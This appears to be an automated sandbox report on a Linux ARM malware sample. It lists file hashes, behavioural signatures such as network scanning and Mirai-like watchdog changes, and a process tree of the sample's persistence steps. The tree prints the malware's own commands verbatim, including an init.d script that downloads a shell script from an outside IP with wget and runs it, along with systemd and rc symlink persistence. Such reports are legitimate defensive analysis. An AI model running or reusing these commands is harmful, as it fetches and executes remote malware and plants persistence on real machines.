Analysis

  • max time kernel
    149s
  • max time network
    155s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    25/11/2024, 02:39

General

  • Target

    871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf

  • Size

    109KB

  • MD5

    e24a9404e3d31d669d6f86c8024e5e72

  • SHA1

    3f5b41ed4ea8db7ef43b04a5aebfef0e06442e7e

  • SHA256

    871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45

  • SHA512

    20929f46483b6321809f95a41a6afe0b19d52dd6519e65a65e36361569dd33410c0db7844db4571e4d266177160b1de99da1e8822cd96784a1ca91f761eb7acc

  • SSDEEP

    3072:a3q1v2+7eYYOpq22URk0bEAgks32wGPOFnnbC:a3xGtqfUR1IAgksGLPt

Malware Config

Signatures

  • Contacts a large (13786) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Unexpected DNS network traffic destination 64 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Checks mountinfo of local process 1 TTPs 1 IoCs

    Checks mountinfo of running processes which indicate if it is running in chroot jail.

  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies init.d 2 TTPs 2 IoCs

    Adds/modifies system service, likely for persistence.

  • Modifies rc script 2 TTPs 1 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

  • Modifies systemd 2 TTPs 1 IoCs

    Adds/ modifies systemd service files. Likely to achieve persistence.

  • Modifies Bash startup script 2 TTPs 1 IoCs
  • Changes its process name 24 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf
    /tmp/871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf
    1⤵
    • Modifies Watchdog functionality
    • Checks mountinfo of local process
    • Creates/modifies environment variables
    • Modifies init.d
    • Modifies rc script
    • Modifies systemd
    • Modifies Bash startup script
    • Changes its process name
    • Reads runtime system information
    PID:654
    • /bin/sh
      sh -c "systemctl enable custom.service >/dev/null 2>&1"
      2⤵
        PID:656
        • /bin/systemctl
          systemctl enable custom.service
          3⤵
          • Enumerates kernel/hardware configuration
          • Reads runtime system information
          PID:666
      • /bin/sh
        sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
        2⤵
          PID:678
          • /bin/ln
            ln -s /etc/init.d/system /etc/rcS.d/S99system
            3⤵
              PID:680
          • /bin/sh
            sh -c "echo \"#!/bin/sh # /etc/init.d/sh case \\\"\$1\\\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/sh"
            2⤵
            • File and Directory Permissions Modification
            • Modifies init.d
            PID:683
          • /bin/sh
            sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
            2⤵
            • File and Directory Permissions Modification
            PID:685
            • /bin/chmod
              chmod +x /etc/init.d/sh
              3⤵
              • File and Directory Permissions Modification
              PID:687
          • /bin/sh
            sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
            2⤵
              PID:689
              • /bin/mkdir
                mkdir -p /etc/rc.d
                3⤵
                  PID:691
              • /bin/sh
                sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
                2⤵
                  PID:694
                  • /bin/ln
                    ln -s /etc/init.d/sh /etc/rc.d/S99sh
                    3⤵
                      PID:696

                Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • /boot/bootcmd

                        Filesize

                        109B

                        MD5

                        735cae7d3cbab0f59d95f84790282103

                        SHA1

                        1cb77931b3097f18988016c9ceba3280a5ccb2ae

                        SHA256

                        dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b

                        SHA512

                        998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe

                      • /etc/init.d/sh

                        Filesize

                        353B

                        MD5

                        c5583b6a699f62cb0a004c99842f5c70

                        SHA1

                        b232ef89bf9b36643b5956aaacfd295b9ce2a0a7

                        SHA256

                        2b03c83558e4af71f3b35408cf668a2ee06931c21adec760952a21a11bc4c59b

                        SHA512

                        a9fc1e4c30452a3d100a8ccfbb707d9d323830fbbca90c98d3c126bf943539baaf1fccb04d435a4b627ed7f1bfb1bbd649dab282488d951dde87e097423e154d

                      • /etc/init.d/system

                        Filesize

                        96B

                        MD5

                        f000251d92c773cc3ee1ca22cf5f0788

                        SHA1

                        e2386fe6a5f29b1e9e5ad5b38928c024f97105e6

                        SHA256

                        31a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985

                        SHA512

                        0dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2

                      • /etc/inittab

                        Filesize

                        101B

                        MD5

                        3d6b6e1b05ad5d0538ccd8804bcd279b

                        SHA1

                        0fc061b51c225d5bea072c939de05e8a856558bc

                        SHA256

                        cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5

                        SHA512

                        1957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98

                      • /etc/systemd/system/custom.service

                        Filesize

                        290B

                        MD5

                        19a440fdac7f578f2fb33719698a082c

                        SHA1

                        ebadce21c65d05ad62a324deb39c57aecd3edf2c

                        SHA256

                        b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69

                        SHA512

                        8bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb